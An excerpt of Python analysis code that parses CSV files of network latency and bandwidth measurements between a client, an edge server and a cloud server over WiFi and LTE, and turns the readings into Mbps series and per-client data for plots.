def readvalues_activelatencyboxplot(inputfile, noise, segment):
ret = []
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[12] == "latency"
assert row[9] == "Keyword"
assert row[6] == "ReceiverIdentity"
assert row[5] == "SenderIdentity"
assert row[4] == "Command"
assert row[3] == "Direction"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
command = row[4]
senderIdentity = row[5]
receiverIdentity = row[6]
latency = float(row[12])
direction = row[3]
keyword = row[9]
assert command == "TCPRTT" or command == "UDPRTT"
if segment == "clientNitos":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> local observer
if senderIdentity != "Client":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Upstream: Client <- local observer
if receiverIdentity != "Client":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
elif segment == "clientUnipi":
if "remote" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> cloud observer
if senderIdentity != "Client":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Upstream: Client <- cloud observer
if receiverIdentity != "Client":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
elif segment == "NitosUnipi":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: local observer -> remote server
if senderIdentity != "Observer":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Downstream: local observer <- remote(cloud) server
if receiverIdentity != "Observer":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
else:
print ("unknown segment")
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readvalues_activebandwidthboxplot(inputfile, noise, segment):
ret = []
Mb_s = 0
sec = 0
lastID = -1
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[12] == "Kbit"
assert row[13] == "nanoTimes"
assert row[9] == "Keyword"
assert row[6] == "ReceiverIdentity"
assert row[5] == "SenderIdentity"
assert row[4] == "Command"
assert row[3] == "Direction"
assert row[1] == "ID"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
testID = row[1]
command = row[4]
senderIdentity = row[5]
receiverIdentity = row[6]
Kbit = float(row[12])
Mbit = Kbit/1000
nanoTimes = float(row[13])
s = nanoTimes/1000000000
direction = row[3]
keyword = row[9]
assert command == "TCPBandwidth" or command == "UDPBandwidth"
if segment == "clientNitos":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> local observer
if senderIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
elif direction == "Downstream":
#Downstream: Client <- local observer
if receiverIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
else:
print ("unknown direction")
sys.exit(0)
elif segment == "clientUnipi":
if "remote" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> remote observer (unipi)
if senderIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
elif direction == "Downstream":
#Downstream: Client <- remote observer (unipi)
if receiverIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
else:
print ("unknown direction")
sys.exit(0)
elif segment == "NitosUnipi":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: MEC observer(local) -> remote (cloud) server
if senderIdentity != "Observer":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
elif direction == "Downstream":
#Downstream: MEC observer(local) <- remote (cloud) server
if receiverIdentity != "Observer":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec = s
elif testID == lastID:
#new measure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec = s
else:
print ("unknown direction")
sys.exit(0)
else:
print ("unknown segment")
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readvalues_activebandwidthlineplot(config_parser, section, command, direction, conn):
noiselist = config_parser.get(section, "noise").split(",")
if conn == "wifi":
dates_list = config_parser.get(section, "dates_activewifi").split(",")
elif conn == "lte":
dates_list = config_parser.get(section, "dates_activelte").split(",")
legend = []
if direction == "Upstream":
legend.append("Client -> Observer (Nitos)")
legend.append("Client -> Observer (unipi)")
legend.append("Observer (Nitos) -> Remote(unipi)")
legend.append("Observer (unipi) -> Remote(unipi)")
elif direction == "Downstream":
legend.append("Observer (Nitos) -> Client")
legend.append("Observer (unipi) -> Client")
legend.append("Remote(unipi) -> Observer (Nitos)")
legend.append("Remote(unipi) -> Observer (unipi)")
clientNitos = {"x":[], "y":[], "legend": legend[0]}
clientUnipi = {"x":[], "y":[], "legend": legend[1]}
NitosUnipi = {"x":[], "y":[], "legend": legend[2]}
lastID = -1
Mbitlist = []
seclist = []
for noise in noiselist:
inputfile = "csv/active/" + command + "-" + direction + "-" + conn + "-noise" + noise + "_"
inputfile += dates_list[0].strip() + "-" + dates_list[-1].strip() + ".csv"
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
if command == "TCPBandwidth" or command == "UDPBandwidth":
assert row[12] == "Kbit"
assert row[13] == "nanoTimes"
elif command == "TCPRTT" or command == "UDPRTT":
assert row[12] == "latency"
else:
print ("unknown command")
sys.exit(0)
assert row[9] == "Keyword"
assert row[5] == "SenderIdentity"
assert row[6] == "ReceiverIdentity"
assert row[3] == "Direction"
assert row[2] == "Timestamp"
assert row[1] == "ID"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
if direction != row[3]:
print ("unexpected direction " + str(row[3]))
sys.exit(0)
if command == "TCPBandwidth" or command == "UDPBandwidth":
Kbit = float(row[12])
Mbit = Kbit/1000
nanosec = float(row[13])
sec = 1.0 * nanosec/1000000000
elif command == "TCPRTT" or command == "UDPRTT":
# row[12] == "latency"; placeholder value, the RTT branches below append fixed dummy values
measure = 100
if "local" in row[9]:
if row[5] == "Client" or row[6] == "Client":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
clientNitos["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
clientNitos["x"].append(row[2])
Mbitlist = []
seclist = []
else:
clientNitos["y"].append(100)
elif row[5] == "Server" or row[6] == "Server":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
NitosUnipi["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
NitosUnipi["x"].append(row[2])
Mbitlist = []
seclist = []
else:
NitosUnipi["y"].append(200)
else:
print ("error")
print (row)
sys.exit(0)
if "remote" in row[9]:
if row[5] == "Client" or row[6] == "Client":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
clientUnipi["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
clientUnipi["x"].append(row[2])
Mbitlist = []
seclist = []
else:
clientUnipi["y"].append(300)
elif row[5] == "Server" or row[6] == "Server":
continue
else:
print ("error")
print (row)
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return clientNitos, clientUnipi, NitosUnipi
def readbandwidthvalues_timeseries_self(config_parser, section, inputfile, edgeserver, conntype):
assert "SORTED_LEGACY" in inputfile
assert "self" in inputfile
ret = []
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
sys.exit(0)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
#columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
assert row[13] == "Bytes"
assert row[12] == "Timestamp"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
measuredbytes = row[13]
current_timenstamp = row[12]
keyword = row[6]
clientIP = row[2]
serverIP = row[4]
try:
assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except Exception as e:
print (conntype)
print (inputfile)
print (row[2][:len(client_subnetaddr)] + "!=" + client_subnetaddr)
linecount += 1
continue
linecount += 1
if (edgeserver and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(not edgeserver and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
bandwidthkbps = float(row[13])
bandwidthMbps = bandwidthkbps / 1000
ret.append(bandwidthMbps)
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readbandwidthvalues_mim(config_parser, section, inputfile, connectiontype, segment, logger):
assert "SORTED_LEGACY" in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret = []
last_testID = ""
if connectiontype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif connectiontype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type")
logger.critical("EXIT")
sys.exit(0)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + str(linecount) + ": " + str(row))
continue
#line #2 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except Exception as e:
print (e)
print (row)
logger.critical("linecount = 2 " + str(row) + " unexpected columns")
logger.critical("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp in microseconds
clientIP = row[2]
serverIP = row[4]
clientPort = row[3]
serverPort = row[5]
if (segment == "edge" and row[4][:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "remote" and row[4][:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
currentTestID = clientIP + "-" + clientPort + "-" + serverIP + "-" + serverPort
if last_testID == "":
#this is the first row
last_testID = currentTestID
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
############################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
rowcounter = 1
current_micros = 0.0
elif last_testID == currentTestID:
#same test
#################### FOR DEBUGGING ONLY ####################
assert clientIP == lastclientIP
assert serverIP == lastServerIP
assert clientPort == lastClientPort
assert serverPort == lastServerPort
try:
assert previoustimestamp_micros <= currenttimestamp_micros
except:
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("previoustimestamp_micros = " + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros = " + str(currenttimestamp_micros))
sys.exit(0)
##############################################################
rowcounter += 1
if byte > 0:
currentByte += byte
current_micros += currenttimestamp_micros - previoustimestamp_micros
if current_micros >= 1000000: #more than one sec
current_s = current_micros /1000000 #from microseconds to seconds
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
currentByte = 0.0
current_micros = 0.0
previoustimestamp_micros = currenttimestamp_micros
else:
#newtest
if currentByte > 0:
current_s = current_micros /1000000
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
if rowcounter >= _MINROWNUMBER:
for elem in packets_bandwidth:
#print (elem)
ret.append(elem)
#logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
#print ("skipped " + last_testID + " with rowcounter " + str(rowcounter))
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
last_testID = currentTestID
lastclientIP = clientIP
############################FOR DEBUGGING ONLY##############################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
###########################################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
rowcounter = 1
current_micros = 0.0
#print ret
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readbandwidthvalues_mim_usingfixbucket(config_parser, section, inputfile, connectiontype, segment, logger,
bucketsize_microsec):
assert "SORTED" in inputfile
assert "LEGACY" not in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret = []
lastclientIP = ""
pastclientIP = []
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=connectiontype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("bucketsize_microsec = " + str(bucketsize_microsec))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + str(linecount) + ": " + str(row))
continue
#line #2 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except Exception as e:
print (e)
print (row)
logger.critical("linecount = 2 " + str(row) + " unexpected columns")
logger.critical("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp in microseconds
clientIP = row[2]
serverIP = row[4]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "remote" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if lastclientIP == "":
#this is the first row containing results for the target server
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
pastclientIP.append(clientIP)
lastServerIP = serverIP
############################################################
currentBytes = 0.0
previoustimestamp_micros = currenttimestamp_micros
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
elif lastclientIP == clientIP:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert serverIP == lastServerIP
try:
assert clientIP in pastclientIP
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
print (clientIP)
print(pastclientIP)
print (linecount)
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical("EXIT")
sys.exit(-1)
##############################################################
if currenttimestamp_micros < bucket_endtime_microsec:
#packet received within the bucketsize_microsec interval
currentBytes += byte
else:
#packet received within the next bucketsize_microsec interval
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret.append(Mbps)
currentBytes = byte
bucket_starttime_microsec = bucket_endtime_microsec
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
else:
#switch to a new client
pastclientIP.append(clientIP)
#add the last results
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret.append(Mbps)
lastclientIP = clientIP
lastServerIP = serverIP
currentBytes = byte
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
previoustimestamp_micros = currenttimestamp_micros
#print ret
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readbandwidthvalues_self(config_parser, section, inputfile, edgeserver, conntype):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "self" in inputfile
ret = []
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
sys.exit(0)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
measuredbytes = row[13]
keyword = row[6]
clientIP = row[2]
serverIP = row[4]
try:
assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except Exception as e:
print (conntype)
print (inputfile)
print (row[2][:len(client_subnetaddr)] + "!=" + client_subnetaddr)
linecount += 1
continue
linecount += 1
if (edgeserver and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(not edgeserver and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
bandwidthkbps = float(row[13])
bandwidthMbps = bandwidthkbps / 1000
ret.append(bandwidthMbps)
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
#returns a dict
def readbandwidthvalues_mim_perclient(config_parser, section, inputfile, connectiontype, segment, logger):
assert "SORTED_LEGACY" in inputfile
assert "mim" in inputfile
logger.debug("\n")
#ret = {}
ret= OrderedDict()
last_testID = ""
if connectiontype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif connectiontype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type.")
logger.critical("EXIT")
sys.exit(0)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + str(linecount) + ": " + str(row))
continue
#line #2 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except Exception as e:
print (e)
print (row)
logger.critical("linecount = 2 " + str(row) + " unexpected columns")
logger.critical("EXIT")
sys.exit(1)
linecount += 1
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microseconds
clientIP = row[2]
serverIP = row[4]
clientPort = row[3]
serverPort = row[5]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
currentTestID = clientIP + "-" + clientPort + "-" + serverIP + "-" + serverPort
if last_testID == "":
#this is the first row that contains results values
last_testID = currentTestID
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
############################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
totalbytes = byte
rowcounter = 1
current_micros = 0.0
elif last_testID == currentTestID:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert clientIP == lastclientIP
assert serverIP == lastServerIP
assert clientPort == lastClientPort
assert serverPort == lastServerPort
try:
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
exception_type, exception_obj, exception_traceback = sys.exc_info()
print (linecount)
print ("error on " + str(exception_traceback.tb_frame.f_code.co_filename) + "," + \
str(exception_traceback.tb_lineno))
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical("EXIT")
sys.exit(-1)
##############################################################
rowcounter += 1
if byte > 0:
#if currenttimestamp_micros - previoustimestamp_micros > 1000000:
# print (currenttimestamp_micros - previoustimestamp_micros)/1000000 * 3
# print(str(currenttimestamp_micros) + "-" + str(previoustimestamp_micros) + ": " + str(currenttimestamp_micros - previoustimestamp_micros))
currentByte += byte
#totalbyte += byte
current_micros += currenttimestamp_micros - previoustimestamp_micros
if current_micros >= 1000000: #more than one sec
current_s = current_micros /1000000 #from microseconds to seconds
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
currentByte = 0.0
current_micros = 0.0
previoustimestamp_micros = currenttimestamp_micros
else:
#new testID
if currentByte > 0:
current_s = current_micros /1000000
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
if rowcounter >= _MINROWNUMBER:
#Kb = 1.0 * totalbyte /1024
#Mb = Kb / 1024
#index = clientIP + str(Mb)
#ret[index]=packets_bandwidth
ret[clientIP]=packets_bandwidth
logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
last_testID = currentTestID
lastclientIP = clientIP
############################FOR DEBUGGING ONLY##############################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
#################################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
totalbytes = byte
rowcounter = 1
current_micros = 0.0
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
#add the last flow results
assert clientIP == lastclientIP
if rowcounter >= _MINROWNUMBER:
ret[clientIP]=packets_bandwidth
logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
#logger.debug("dict = " + str(ret))
logger.debug(str(len(ret)) + " clients in ret")
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret
def readbandwidthvalues_mim_perclient_usingfixbucket(config_parser, section, inputfile, connectiontype,
segment, logger, bucketsize_microsec):
assert bucketsize_microsec != None
assert "SORTED" in inputfile
assert "LEGACY" not in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret= OrderedDict()
totalbytes= OrderedDict()
lastclientIP = ""
pastclientIP = []
currentBytes = 0.0
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=connectiontype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
logger.debug("bucketsize_microsec = " + str(bucketsize_microsec))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + str(linecount) + ": " + str(row))
continue
#line #2 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except Exception as e:
print (e)
print (row)
logger.critical("linecount = 2 " + str(row) + " unexpected columns")
logger.critical("EXIT")
sys.exit(1)
linecount += 1
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microseconds
clientIP = row[2]
serverIP = row[4]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if lastclientIP == "":
#this is the first row containing results for the target server
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
pastclientIP.append(clientIP)
lastServerIP = serverIP
############################################################
totalbytes[clientIP] = byte
ret[clientIP] = []
previoustimestamp_micros = currenttimestamp_micros
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
elif lastclientIP == clientIP:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert serverIP == lastServerIP
try:
assert clientIP in pastclientIP
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
print (clientIP)
print(pastclientIP)
print (linecount)
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical("EXIT")
sys.exit(-1)
##############################################################
totalbytes[clientIP] += byte
if currenttimestamp_micros < bucket_endtime_microsec:
#packet received within the bucketsize_microsec interval
currentBytes += byte
else:
#packet received within the next bucketsize_microsec interval
if currentBytes == 0:
Mbps = 0
